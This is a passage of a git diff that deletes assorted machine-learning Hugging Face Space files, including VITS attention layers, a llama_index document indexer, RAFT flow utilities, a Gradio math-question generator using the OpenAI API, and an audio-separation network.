type=float, default=0.25, help='confidence threshold') - parser.add_argument('--iou-thres', type=float, default=0.45, help='NMS IoU threshold') - parser.add_argument('--max-det', type=int, default=1000, help='maximum detections per image') - parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu') - parser.add_argument('--view-img', action='store_true', help='show results') - parser.add_argument('--save-txt', action='store_true', help='save results to *.txt') - parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels') - parser.add_argument('--save-crop', action='store_true', help='save cropped prediction boxes') - parser.add_argument('--nosave', action='store_true', help='do not save images/videos') - parser.add_argument('--classes', nargs='+', type=int, help='filter by class: --classes 0, or --classes 0 2 3') - parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS') - parser.add_argument('--augment', action='store_true', help='augmented inference') - parser.add_argument('--visualize', action='store_true', help='visualize features') - parser.add_argument('--update', action='store_true', help='update all models') - parser.add_argument('--project', default=ROOT / 'runs/detect', help='save results to project/name') - parser.add_argument('--name', default='exp', help='save results to project/name') - parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment') - parser.add_argument('--line-thickness', default=3, type=int, help='bounding box thickness (pixels)') - parser.add_argument('--hide-labels', default=False, action='store_true', help='hide labels') - parser.add_argument('--hide-conf', default=False, action='store_true', help='hide confidences') - parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference') - parser.add_argument('--dnn', action='store_true', help='use OpenCV DNN for ONNX inference') - parser.add_argument('--vid-stride', type=int, default=1, help='video frame-rate stride') - opt = parser.parse_args() - opt.imgsz *= 2 if len(opt.imgsz) == 1 else 1 # expand - print_args(vars(opt)) - return opt - - -def main(opt): - check_requirements(exclude=('tensorboard', 'thop')) - run(**vars(opt)) - - -if __name__ == "__main__": - opt = parse_opt() - main(opt) diff --git a/spaces/Ikaros521/VITS-fast-fine-tuning_nymph/attentions.py b/spaces/Ikaros521/VITS-fast-fine-tuning_nymph/attentions.py deleted file mode 100644 index 4e0b0c1fd48c962e21e1fbe60b23fc574927435c..0000000000000000000000000000000000000000 --- a/spaces/Ikaros521/VITS-fast-fine-tuning_nymph/attentions.py +++ /dev/null @@ -1,303 +0,0 @@ -import copy -import math -import numpy as np -import torch -from torch import nn -from torch.nn import functional as F - -import commons -import modules -from modules import LayerNorm - - -class Encoder(nn.Module): - def __init__(self, hidden_channels, filter_channels, n_heads, n_layers, kernel_size=1, p_dropout=0., window_size=4, **kwargs): - super().__init__() - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.window_size = window_size - - self.drop = nn.Dropout(p_dropout) - self.attn_layers = nn.ModuleList() - self.norm_layers_1 = nn.ModuleList() - self.ffn_layers = nn.ModuleList() - self.norm_layers_2 = nn.ModuleList() - for i in range(self.n_layers): - 
self.attn_layers.append(MultiHeadAttention(hidden_channels, hidden_channels, n_heads, p_dropout=p_dropout, window_size=window_size)) - self.norm_layers_1.append(LayerNorm(hidden_channels)) - self.ffn_layers.append(FFN(hidden_channels, hidden_channels, filter_channels, kernel_size, p_dropout=p_dropout)) - self.norm_layers_2.append(LayerNorm(hidden_channels)) - - def forward(self, x, x_mask): - attn_mask = x_mask.unsqueeze(2) * x_mask.unsqueeze(-1) - x = x * x_mask - for i in range(self.n_layers): - y = self.attn_layers[i](x, x, attn_mask) - y = self.drop(y) - x = self.norm_layers_1[i](x + y) - - y = self.ffn_layers[i](x, x_mask) - y = self.drop(y) - x = self.norm_layers_2[i](x + y) - x = x * x_mask - return x - - -class Decoder(nn.Module): - def __init__(self, hidden_channels, filter_channels, n_heads, n_layers, kernel_size=1, p_dropout=0., proximal_bias=False, proximal_init=True, **kwargs): - super().__init__() - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.proximal_bias = proximal_bias - self.proximal_init = proximal_init - - self.drop = nn.Dropout(p_dropout) - self.self_attn_layers = nn.ModuleList() - self.norm_layers_0 = nn.ModuleList() - self.encdec_attn_layers = nn.ModuleList() - self.norm_layers_1 = nn.ModuleList() - self.ffn_layers = nn.ModuleList() - self.norm_layers_2 = nn.ModuleList() - for i in range(self.n_layers): - self.self_attn_layers.append(MultiHeadAttention(hidden_channels, hidden_channels, n_heads, p_dropout=p_dropout, proximal_bias=proximal_bias, proximal_init=proximal_init)) - self.norm_layers_0.append(LayerNorm(hidden_channels)) - self.encdec_attn_layers.append(MultiHeadAttention(hidden_channels, hidden_channels, n_heads, p_dropout=p_dropout)) - self.norm_layers_1.append(LayerNorm(hidden_channels)) - self.ffn_layers.append(FFN(hidden_channels, hidden_channels, filter_channels, kernel_size, p_dropout=p_dropout, causal=True)) - self.norm_layers_2.append(LayerNorm(hidden_channels)) - - def forward(self, x, x_mask, h, h_mask): - """ - x: decoder input - h: encoder output - """ - self_attn_mask = commons.subsequent_mask(x_mask.size(2)).to(device=x.device, dtype=x.dtype) - encdec_attn_mask = h_mask.unsqueeze(2) * x_mask.unsqueeze(-1) - x = x * x_mask - for i in range(self.n_layers): - y = self.self_attn_layers[i](x, x, self_attn_mask) - y = self.drop(y) - x = self.norm_layers_0[i](x + y) - - y = self.encdec_attn_layers[i](x, h, encdec_attn_mask) - y = self.drop(y) - x = self.norm_layers_1[i](x + y) - - y = self.ffn_layers[i](x, x_mask) - y = self.drop(y) - x = self.norm_layers_2[i](x + y) - x = x * x_mask - return x - - -class MultiHeadAttention(nn.Module): - def __init__(self, channels, out_channels, n_heads, p_dropout=0., window_size=None, heads_share=True, block_length=None, proximal_bias=False, proximal_init=False): - super().__init__() - assert channels % n_heads == 0 - - self.channels = channels - self.out_channels = out_channels - self.n_heads = n_heads - self.p_dropout = p_dropout - self.window_size = window_size - self.heads_share = heads_share - self.block_length = block_length - self.proximal_bias = proximal_bias - self.proximal_init = proximal_init - self.attn = None - - self.k_channels = channels // n_heads - self.conv_q = nn.Conv1d(channels, channels, 1) - self.conv_k = nn.Conv1d(channels, channels, 1) - self.conv_v = nn.Conv1d(channels, channels, 1) - self.conv_o = nn.Conv1d(channels, out_channels, 1) - 
self.drop = nn.Dropout(p_dropout) - - if window_size is not None: - n_heads_rel = 1 if heads_share else n_heads - rel_stddev = self.k_channels**-0.5 - self.emb_rel_k = nn.Parameter(torch.randn(n_heads_rel, window_size * 2 + 1, self.k_channels) * rel_stddev) - self.emb_rel_v = nn.Parameter(torch.randn(n_heads_rel, window_size * 2 + 1, self.k_channels) * rel_stddev) - - nn.init.xavier_uniform_(self.conv_q.weight) - nn.init.xavier_uniform_(self.conv_k.weight) - nn.init.xavier_uniform_(self.conv_v.weight) - if proximal_init: - with torch.no_grad(): - self.conv_k.weight.copy_(self.conv_q.weight) - self.conv_k.bias.copy_(self.conv_q.bias) - - def forward(self, x, c, attn_mask=None): - q = self.conv_q(x) - k = self.conv_k(c) - v = self.conv_v(c) - - x, self.attn = self.attention(q, k, v, mask=attn_mask) - - x = self.conv_o(x) - return x - - def attention(self, query, key, value, mask=None): - # reshape [b, d, t] -> [b, n_h, t, d_k] - b, d, t_s, t_t = (*key.size(), query.size(2)) - query = query.view(b, self.n_heads, self.k_channels, t_t).transpose(2, 3) - key = key.view(b, self.n_heads, self.k_channels, t_s).transpose(2, 3) - value = value.view(b, self.n_heads, self.k_channels, t_s).transpose(2, 3) - - scores = torch.matmul(query / math.sqrt(self.k_channels), key.transpose(-2, -1)) - if self.window_size is not None: - assert t_s == t_t, "Relative attention is only available for self-attention." - key_relative_embeddings = self._get_relative_embeddings(self.emb_rel_k, t_s) - rel_logits = self._matmul_with_relative_keys(query /math.sqrt(self.k_channels), key_relative_embeddings) - scores_local = self._relative_position_to_absolute_position(rel_logits) - scores = scores + scores_local - if self.proximal_bias: - assert t_s == t_t, "Proximal bias is only available for self-attention." - scores = scores + self._attention_bias_proximal(t_s).to(device=scores.device, dtype=scores.dtype) - if mask is not None: - scores = scores.masked_fill(mask == 0, -1e4) - if self.block_length is not None: - assert t_s == t_t, "Local attention is only available for self-attention." - block_mask = torch.ones_like(scores).triu(-self.block_length).tril(self.block_length) - scores = scores.masked_fill(block_mask == 0, -1e4) - p_attn = F.softmax(scores, dim=-1) # [b, n_h, t_t, t_s] - p_attn = self.drop(p_attn) - output = torch.matmul(p_attn, value) - if self.window_size is not None: - relative_weights = self._absolute_position_to_relative_position(p_attn) - value_relative_embeddings = self._get_relative_embeddings(self.emb_rel_v, t_s) - output = output + self._matmul_with_relative_values(relative_weights, value_relative_embeddings) - output = output.transpose(2, 3).contiguous().view(b, d, t_t) # [b, n_h, t_t, d_k] -> [b, d, t_t] - return output, p_attn - - def _matmul_with_relative_values(self, x, y): - """ - x: [b, h, l, m] - y: [h or 1, m, d] - ret: [b, h, l, d] - """ - ret = torch.matmul(x, y.unsqueeze(0)) - return ret - - def _matmul_with_relative_keys(self, x, y): - """ - x: [b, h, l, d] - y: [h or 1, m, d] - ret: [b, h, l, m] - """ - ret = torch.matmul(x, y.unsqueeze(0).transpose(-2, -1)) - return ret - - def _get_relative_embeddings(self, relative_embeddings, length): - max_relative_position = 2 * self.window_size + 1 - # Pad first before slice to avoid using cond ops. 
- pad_length = max(length - (self.window_size + 1), 0) - slice_start_position = max((self.window_size + 1) - length, 0) - slice_end_position = slice_start_position + 2 * length - 1 - if pad_length > 0: - padded_relative_embeddings = F.pad( - relative_embeddings, - commons.convert_pad_shape([[0, 0], [pad_length, pad_length], [0, 0]])) - else: - padded_relative_embeddings = relative_embeddings - used_relative_embeddings = padded_relative_embeddings[:,slice_start_position:slice_end_position] - return used_relative_embeddings - - def _relative_position_to_absolute_position(self, x): - """ - x: [b, h, l, 2*l-1] - ret: [b, h, l, l] - """ - batch, heads, length, _ = x.size() - # Concat columns of pad to shift from relative to absolute indexing. - x = F.pad(x, commons.convert_pad_shape([[0,0],[0,0],[0,0],[0,1]])) - - # Concat extra elements so to add up to shape (len+1, 2*len-1). - x_flat = x.view([batch, heads, length * 2 * length]) - x_flat = F.pad(x_flat, commons.convert_pad_shape([[0,0],[0,0],[0,length-1]])) - - # Reshape and slice out the padded elements. - x_final = x_flat.view([batch, heads, length+1, 2*length-1])[:, :, :length, length-1:] - return x_final - - def _absolute_position_to_relative_position(self, x): - """ - x: [b, h, l, l] - ret: [b, h, l, 2*l-1] - """ - batch, heads, length, _ = x.size() - # padd along column - x = F.pad(x, commons.convert_pad_shape([[0, 0], [0, 0], [0, 0], [0, length-1]])) - x_flat = x.view([batch, heads, length**2 + length*(length -1)]) - # add 0's in the beginning that will skew the elements after reshape - x_flat = F.pad(x_flat, commons.convert_pad_shape([[0, 0], [0, 0], [length, 0]])) - x_final = x_flat.view([batch, heads, length, 2*length])[:,:,:,1:] - return x_final - - def _attention_bias_proximal(self, length): - """Bias for self-attention to encourage attention to close positions. - Args: - length: an integer scalar. 
- Returns: - a Tensor with shape [1, 1, length, length] - """ - r = torch.arange(length, dtype=torch.float32) - diff = torch.unsqueeze(r, 0) - torch.unsqueeze(r, 1) - return torch.unsqueeze(torch.unsqueeze(-torch.log1p(torch.abs(diff)), 0), 0) - - -class FFN(nn.Module): - def __init__(self, in_channels, out_channels, filter_channels, kernel_size, p_dropout=0., activation=None, causal=False): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.filter_channels = filter_channels - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.activation = activation - self.causal = causal - - if causal: - self.padding = self._causal_padding - else: - self.padding = self._same_padding - - self.conv_1 = nn.Conv1d(in_channels, filter_channels, kernel_size) - self.conv_2 = nn.Conv1d(filter_channels, out_channels, kernel_size) - self.drop = nn.Dropout(p_dropout) - - def forward(self, x, x_mask): - x = self.conv_1(self.padding(x * x_mask)) - if self.activation == "gelu": - x = x * torch.sigmoid(1.702 * x) - else: - x = torch.relu(x) - x = self.drop(x) - x = self.conv_2(self.padding(x * x_mask)) - return x * x_mask - - def _causal_padding(self, x): - if self.kernel_size == 1: - return x - pad_l = self.kernel_size - 1 - pad_r = 0 - padding = [[0, 0], [0, 0], [pad_l, pad_r]] - x = F.pad(x, commons.convert_pad_shape(padding)) - return x - - def _same_padding(self, x): - if self.kernel_size == 1: - return x - pad_l = (self.kernel_size - 1) // 2 - pad_r = self.kernel_size // 2 - padding = [[0, 0], [0, 0], [pad_l, pad_r]] - x = F.pad(x, commons.convert_pad_shape(padding)) - return x diff --git a/spaces/Intoval/privateChatGPT/modules/llama_func.py b/spaces/Intoval/privateChatGPT/modules/llama_func.py deleted file mode 100644 index aec202a851c8ec51d1a96ce23320919af0d22a95..0000000000000000000000000000000000000000 --- a/spaces/Intoval/privateChatGPT/modules/llama_func.py +++ /dev/null @@ -1,166 +0,0 @@ -import os -import logging - -from llama_index import download_loader -from llama_index import ( - Document, - LLMPredictor, - PromptHelper, - QuestionAnswerPrompt, - RefinePrompt, -) -import colorama -import PyPDF2 -from tqdm import tqdm - -from modules.presets import * -from modules.utils import * -from modules.config import local_embedding - - -def get_index_name(file_src): - file_paths = [x.name for x in file_src] - file_paths.sort(key=lambda x: os.path.basename(x)) - - md5_hash = hashlib.md5() - for file_path in file_paths: - with open(file_path, "rb") as f: - while chunk := f.read(8192): - md5_hash.update(chunk) - - return md5_hash.hexdigest() - - -def block_split(text): - blocks = [] - while len(text) > 0: - blocks.append(Document(text[:1000])) - text = text[1000:] - return blocks - - -def get_documents(file_src): - documents = [] - logging.debug("Loading documents...") - logging.debug(f"file_src: {file_src}") - for file in file_src: - filepath = file.name - filename = os.path.basename(filepath) - file_type = os.path.splitext(filepath)[1] - logging.info(f"loading file: {filename}") - try: - if file_type == ".pdf": - logging.debug("Loading PDF...") - try: - from modules.pdf_func import parse_pdf - from modules.config import advance_docs - - two_column = advance_docs["pdf"].get("two_column", False) - pdftext = parse_pdf(filepath, two_column).text - except: - pdftext = "" - with open(filepath, "rb") as pdfFileObj: - pdfReader = PyPDF2.PdfReader(pdfFileObj) - for page in tqdm(pdfReader.pages): - pdftext += page.extract_text() - text_raw = pdftext - elif 
file_type == ".docx": - logging.debug("Loading Word...") - DocxReader = download_loader("DocxReader") - loader = DocxReader() - text_raw = loader.load_data(file=filepath)[0].text - elif file_type == ".epub": - logging.debug("Loading EPUB...") - EpubReader = download_loader("EpubReader") - loader = EpubReader() - text_raw = loader.load_data(file=filepath)[0].text - elif file_type == ".xlsx": - logging.debug("Loading Excel...") - text_list = excel_to_string(filepath) - for elem in text_list: - documents.append(Document(elem)) - continue - else: - logging.debug("Loading text file...") - with open(filepath, "r", encoding="utf-8") as f: - text_raw = f.read() - except Exception as e: - logging.error(f"Error loading file: {filename}") - pass - text = add_space(text_raw) - # text = block_split(text) - # documents += text - documents += [Document(text)] - logging.debug("Documents loaded.") - return documents - - -def construct_index( - api_key, - file_src, - max_input_size=4096, - num_outputs=5, - max_chunk_overlap=20, - chunk_size_limit=600, - embedding_limit=None, - separator=" ", -): - from langchain.chat_models import ChatOpenAI - from langchain.embeddings.huggingface import HuggingFaceEmbeddings - from llama_index import GPTSimpleVectorIndex, ServiceContext, LangchainEmbedding, OpenAIEmbedding - - if api_key: - os.environ["OPENAI_API_KEY"] = api_key - else: - # 由于一个依赖的愚蠢的设计,这里必须要有一个API KEY - os.environ["OPENAI_API_KEY"] = "sk-xxxxxxx" - chunk_size_limit = None if chunk_size_limit == 0 else chunk_size_limit - embedding_limit = None if embedding_limit == 0 else embedding_limit - separator = " " if separator == "" else separator - - prompt_helper = PromptHelper( - max_input_size=max_input_size, - num_output=num_outputs, - max_chunk_overlap=max_chunk_overlap, - embedding_limit=embedding_limit, - chunk_size_limit=600, - separator=separator, - ) - index_name = get_index_name(file_src) - if os.path.exists(f"./index/{index_name}.json"): - logging.info("找到了缓存的索引文件,加载中……") - return GPTSimpleVectorIndex.load_from_disk(f"./index/{index_name}.json") - else: - try: - documents = get_documents(file_src) - if local_embedding: - embed_model = LangchainEmbedding(HuggingFaceEmbeddings()) - else: - embed_model = OpenAIEmbedding() - logging.info("构建索引中……") - with retrieve_proxy(): - service_context = ServiceContext.from_defaults( - prompt_helper=prompt_helper, - chunk_size_limit=chunk_size_limit, - embed_model=embed_model, - ) - index = GPTSimpleVectorIndex.from_documents( - documents, service_context=service_context - ) - logging.debug("索引构建完成!") - os.makedirs("./index", exist_ok=True) - index.save_to_disk(f"./index/{index_name}.json") - logging.debug("索引已保存至本地!") - return index - - except Exception as e: - logging.error("索引构建失败!", e) - print(e) - return None - - -def add_space(text): - punctuations = {",": ", ", "。": "。 ", "?": "? ", "!": "! 
", ":": ": ", ";": "; "} - for cn_punc, en_punc in punctuations.items(): - text = text.replace(cn_punc, en_punc) - return text diff --git a/spaces/Izumazu/ProxyTest/README.md b/spaces/Izumazu/ProxyTest/README.md deleted file mode 100644 index 26e7de60e5441bd41cd2353833d9615b6924f913..0000000000000000000000000000000000000000 --- a/spaces/Izumazu/ProxyTest/README.md +++ /dev/null @@ -1,10 +0,0 @@ ---- -title: ProxyTest -emoji: 📉 -colorFrom: blue -colorTo: red -sdk: docker -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/JUNGU/VToonify/vtoonify/model/raft/core/utils/utils.py b/spaces/JUNGU/VToonify/vtoonify/model/raft/core/utils/utils.py deleted file mode 100644 index 741ccfe4d0d778c3199c586d368edc2882d4fff8..0000000000000000000000000000000000000000 --- a/spaces/JUNGU/VToonify/vtoonify/model/raft/core/utils/utils.py +++ /dev/null @@ -1,82 +0,0 @@ -import torch -import torch.nn.functional as F -import numpy as np -from scipy import interpolate - - -class InputPadder: - """ Pads images such that dimensions are divisible by 8 """ - def __init__(self, dims, mode='sintel'): - self.ht, self.wd = dims[-2:] - pad_ht = (((self.ht // 8) + 1) * 8 - self.ht) % 8 - pad_wd = (((self.wd // 8) + 1) * 8 - self.wd) % 8 - if mode == 'sintel': - self._pad = [pad_wd//2, pad_wd - pad_wd//2, pad_ht//2, pad_ht - pad_ht//2] - else: - self._pad = [pad_wd//2, pad_wd - pad_wd//2, 0, pad_ht] - - def pad(self, *inputs): - return [F.pad(x, self._pad, mode='replicate') for x in inputs] - - def unpad(self,x): - ht, wd = x.shape[-2:] - c = [self._pad[2], ht-self._pad[3], self._pad[0], wd-self._pad[1]] - return x[..., c[0]:c[1], c[2]:c[3]] - -def forward_interpolate(flow): - flow = flow.detach().cpu().numpy() - dx, dy = flow[0], flow[1] - - ht, wd = dx.shape - x0, y0 = np.meshgrid(np.arange(wd), np.arange(ht)) - - x1 = x0 + dx - y1 = y0 + dy - - x1 = x1.reshape(-1) - y1 = y1.reshape(-1) - dx = dx.reshape(-1) - dy = dy.reshape(-1) - - valid = (x1 > 0) & (x1 < wd) & (y1 > 0) & (y1 < ht) - x1 = x1[valid] - y1 = y1[valid] - dx = dx[valid] - dy = dy[valid] - - flow_x = interpolate.griddata( - (x1, y1), dx, (x0, y0), method='nearest', fill_value=0) - - flow_y = interpolate.griddata( - (x1, y1), dy, (x0, y0), method='nearest', fill_value=0) - - flow = np.stack([flow_x, flow_y], axis=0) - return torch.from_numpy(flow).float() - - -def bilinear_sampler(img, coords, mode='bilinear', mask=False): - """ Wrapper for grid_sample, uses pixel coordinates """ - H, W = img.shape[-2:] - xgrid, ygrid = coords.split([1,1], dim=-1) - xgrid = 2*xgrid/(W-1) - 1 - ygrid = 2*ygrid/(H-1) - 1 - - grid = torch.cat([xgrid, ygrid], dim=-1) - img = F.grid_sample(img, grid, align_corners=True) - - if mask: - mask = (xgrid > -1) & (ygrid > -1) & (xgrid < 1) & (ygrid < 1) - return img, mask.float() - - return img - - -def coords_grid(batch, ht, wd, device): - coords = torch.meshgrid(torch.arange(ht, device=device), torch.arange(wd, device=device)) - coords = torch.stack(coords[::-1], dim=0).float() - return coords[None].repeat(batch, 1, 1, 1) - - -def upflow8(flow, mode='bilinear'): - new_size = (8 * flow.shape[2], 8 * flow.shape[3]) - return 8 * F.interpolate(flow, size=new_size, mode=mode, align_corners=True) diff --git a/spaces/JasonData/MathGenerator/app.py b/spaces/JasonData/MathGenerator/app.py deleted file mode 100644 index 8b655f1a8b8f34f0fa2fc7a26ef8787f394b3898..0000000000000000000000000000000000000000 --- a/spaces/JasonData/MathGenerator/app.py +++ /dev/null @@ 
-1,109 +0,0 @@ -import openai -import gradio as gr -import os - -STARTING_PROMPT = [{"role": "user", "content": """You are a math question generator. For each question, I will provide you with 4 things: - 1. the main topic to be tested, 2. the types of question type, 3. the difficulty level, and 4. the required skillsets to solve the question. - You will then reply with appropriate math question as well as the step by step solution for the question. Reply in Four parts. - 1. Question Information: - Topic(s) Tested: ... - Question Type: ... - Difficulty Level: ... - Skills required: ... - Case Study: True/False - - 2. Question: .... - - 3. Step by Step Solution: ... - - 4. Final answer(s): ..."""}, - {"role": "assistant", "content": f"OK"}] - -openai.api_key = os.environ['OPENAI'] - - -def predict(input, msg_history=STARTING_PROMPT): - msg_history.append({"role": "user", "content": f"{input}"}) - print(msg_history) - - completion = openai.ChatCompletion.create(model="gpt-3.5-turbo", messages=msg_history, temperature=0.8) - response = completion.choices[0].message.content - msg_history.append({"role": "assistant", "content": f"{response}"}) - - return [response, msg_history] - - -def prompt_builder_predict(questionType=None, difficulty=0, topic=None, prerequisites=None, caseStudy=False, additionalPrompt=None, msg_history=STARTING_PROMPT, latex=False): - - level = ['Very Easy', 'Easy', 'Medium', 'Difficult', 'Extremely Difficult'] - prompt = 'randomly generatate a math question ' - if topic: - prompt = prompt + f'on the topic of {topic}. ' - if difficulty: - prompt = prompt + f'The difficulty level of the question should be: {level[difficulty-1]}, which means that it must require at least {difficulty} steps to solve. ' - if questionType: - prompt = prompt + f'The question type should be in {questionType} format. ' - if prerequisites: - prompt = prompt + f"This question will require to use the following methods to solve: {' and '.join(prerequisites)}. " - if caseStudy: - prompt = prompt + 'This question must be in the form of case study where it tries to test the application of the topic in the real life scenario. ' - if latex: - prompt = prompt + 'Display all mathematical equation parts of the question to LaTeX format. ' - if additionalPrompt: - prompt = prompt + f"In addition, {additionalPrompt}." - - return predict(prompt, msg_history) - - -with gr.Blocks() as demo: - - msg_history = gr.State(STARTING_PROMPT) - - gr.Markdown( - """ - # Math Question Generator - This webapp demostrates an API plugin that can be used with LearningANTs to generate questions. The response will contain three parts: [Question, Step by Step Solution, Final answer]. 
- """) - - with gr.Row(): - questionType = gr.Radio(["MCQ", "True or False", "Short Response"], value='Short Response', label="Question Type") - difficulty = gr.Slider(1, 5, value=3, step=1, label="Difficult Level", info="Choose between 1 and 5") - with gr.Row(): - topic = gr.Dropdown(["Simultaneous Equation", "Linear Equation", "Derivatives", "Integrals", "Optimization"], value='Simultaneous Equation', label="Main Testing Topic") - prerequisites = gr.Dropdown(["Elimination", "Subsitution", "Linear Equation", "Algebra", "Geometry", "Trigonometry", "Logarithms", "Power Rule", "Sum Rule", 'Difference Rule', "Product Rule", "Quotient Rule", 'Reciprocal Rule', "Chain Rule", "Implicit Differentiation", "Logarithmic Differentiation"], multiselect=True, interactive=True, label="Prerequisite Topics") - - with gr.Row(): - caseStudy = gr.Checkbox(label="Case Study", info="Does this question test the application of theory in real life scenarios?") - latex = gr.Checkbox(label="LaTeX", value=True, info="Display all equations in LaTeX format?") - - additionalInfo = gr.Textbox(label="Additional information (prompt)", placeholder="Give a scenario where Jim and John are working in a garden....") - - gen_btn = gr.Button("Generate A New Question") - - with gr.Row(): - question = gr.TextArea(label="Generated Question") - - gen_btn.click(fn=prompt_builder_predict, inputs = [questionType, difficulty, topic, prerequisites, caseStudy, additionalInfo, msg_history, latex], outputs= [question, msg_history]) - - with gr.Row(): - prompt = gr.Textbox(label='Additional Prompt', info='Not satified with the result? Enter instructions to modify the question.', placeholder='Include the case study of....', visible=False) - - with gr.Row(): - modify_btn = gr.Button('Modify Question', visible=False) - modify_btn.click(fn=predict, inputs = [prompt, msg_history], outputs= [question, msg_history]) - - - # restart_btn = gr.Button("Generate Another Question", visible=False) - - - def show_display(): - return gr.update(visible=True) - def hide_display(): - return gr.update(visible=False) - def clear_value(): - return gr.update(value='') - - question.change(fn=show_display, outputs=prompt) - question.change(fn=show_display, outputs=modify_btn) - -demo.launch( share=False) \ No newline at end of file diff --git a/spaces/Jdnsn/Alexander/README.md b/spaces/Jdnsn/Alexander/README.md deleted file mode 100644 index 88afff7444a3655c34e6a9375a6aba9118f755d1..0000000000000000000000000000000000000000 --- a/spaces/Jdnsn/Alexander/README.md +++ /dev/null @@ -1,10 +0,0 @@ ---- -title: Alexander -emoji: 👀 -colorFrom: blue -colorTo: yellow -sdk: docker -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Kamtera/Persian_Automatic_Speech_Recognition_and-more/README.md b/spaces/Kamtera/Persian_Automatic_Speech_Recognition_and-more/README.md deleted file mode 100644 index 002f78c8c984c65b9bbf95a2eb2a8df9536aad56..0000000000000000000000000000000000000000 --- a/spaces/Kamtera/Persian_Automatic_Speech_Recognition_and-more/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Multilingual Automatic Speech Recognition-56lang -emoji: ⚡ -colorFrom: gray -colorTo: gray -sdk: gradio -sdk_version: 3.3.1 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Kangarroar/ApplioRVC-Inference/lib/uvr5_pack/lib_v5/nets_33966KB.py 
b/spaces/Kangarroar/ApplioRVC-Inference/lib/uvr5_pack/lib_v5/nets_33966KB.py deleted file mode 100644 index b8986f968dc5383e65d35aac6e4367299de3378b..0000000000000000000000000000000000000000 --- a/spaces/Kangarroar/ApplioRVC-Inference/lib/uvr5_pack/lib_v5/nets_33966KB.py +++ /dev/null @@ -1,122 +0,0 @@ -import torch -from torch import nn -import torch.nn.functional as F - -from . import layers_33966KB as layers - - -class BaseASPPNet(nn.Module): - def __init__(self, nin, ch, dilations=(4, 8, 16, 32)): - super(BaseASPPNet, self).__init__() - self.enc1 = layers.Encoder(nin, ch, 3, 2, 1) - self.enc2 = layers.Encoder(ch, ch * 2, 3, 2, 1) - self.enc3 = layers.Encoder(ch * 2, ch * 4, 3, 2, 1) - self.enc4 = layers.Encoder(ch * 4, ch * 8, 3, 2, 1) - - self.aspp = layers.ASPPModule(ch * 8, ch * 16, dilations) - - self.dec4 = layers.Decoder(ch * (8 + 16), ch * 8, 3, 1, 1) - self.dec3 = layers.Decoder(ch * (4 + 8), ch * 4, 3, 1, 1) - self.dec2 = layers.Decoder(ch * (2 + 4), ch * 2, 3, 1, 1) - self.dec1 = layers.Decoder(ch * (1 + 2), ch, 3, 1, 1) - - def __call__(self, x): - h, e1 = self.enc1(x) - h, e2 = self.enc2(h) - h, e3 = self.enc3(h) - h, e4 = self.enc4(h) - - h = self.aspp(h) - - h = self.dec4(h, e4) - h = self.dec3(h, e3) - h = self.dec2(h, e2) - h = self.dec1(h, e1) - - return h - - -class CascadedASPPNet(nn.Module): - def __init__(self, n_fft): - super(CascadedASPPNet, self).__init__() - self.stg1_low_band_net = BaseASPPNet(2, 16) - self.stg1_high_band_net = BaseASPPNet(2, 16) - - self.stg2_bridge = layers.Conv2DBNActiv(18, 8, 1, 1, 0) - self.stg2_full_band_net = BaseASPPNet(8, 16) - - self.stg3_bridge = layers.Conv2DBNActiv(34, 16, 1, 1, 0) - self.stg3_full_band_net = BaseASPPNet(16, 32) - - self.out = nn.Conv2d(32, 2, 1, bias=False) - self.aux1_out = nn.Conv2d(16, 2, 1, bias=False) - self.aux2_out = nn.Conv2d(16, 2, 1, bias=False) - - self.max_bin = n_fft // 2 - self.output_bin = n_fft // 2 + 1 - - self.offset = 128 - - def forward(self, x, aggressiveness=None): - mix = x.detach() - x = x.clone() - - x = x[:, :, : self.max_bin] - - bandw = x.size()[2] // 2 - aux1 = torch.cat( - [ - self.stg1_low_band_net(x[:, :, :bandw]), - self.stg1_high_band_net(x[:, :, bandw:]), - ], - dim=2, - ) - - h = torch.cat([x, aux1], dim=1) - aux2 = self.stg2_full_band_net(self.stg2_bridge(h)) - - h = torch.cat([x, aux1, aux2], dim=1) - h = self.stg3_full_band_net(self.stg3_bridge(h)) - - mask = torch.sigmoid(self.out(h)) - mask = F.pad( - input=mask, - pad=(0, 0, 0, self.output_bin - mask.size()[2]), - mode="replicate", - ) - - if self.training: - aux1 = torch.sigmoid(self.aux1_out(aux1)) - aux1 = F.pad( - input=aux1, - pad=(0, 0, 0, self.output_bin - aux1.size()[2]), - mode="replicate", - ) - aux2 = torch.sigmoid(self.aux2_out(aux2)) - aux2 = F.pad( - input=aux2, - pad=(0, 0, 0, self.output_bin - aux2.size()[2]), - mode="replicate", - ) - return mask * mix, aux1 * mix, aux2 * mix - else: - if aggressiveness: - mask[:, :, : aggressiveness["split_bin"]] = torch.pow( - mask[:, :, : aggressiveness["split_bin"]], - 1 + aggressiveness["value"] / 3, - ) - mask[:, :, aggressiveness["split_bin"] :] = torch.pow( - mask[:, :, aggressiveness["split_bin"] :], - 1 + aggressiveness["value"], - ) - - return mask * mix - - def predict(self, x_mag, aggressiveness=None): - h = self.forward(x_mag, aggressiveness) - - if self.offset > 0: - h = h[:, :, :, self.offset : -self.offset] - assert h.size()[3] > 0 - - return h diff --git a/spaces/KenjieDec/GPEN/retinaface/facemodels/net.py 
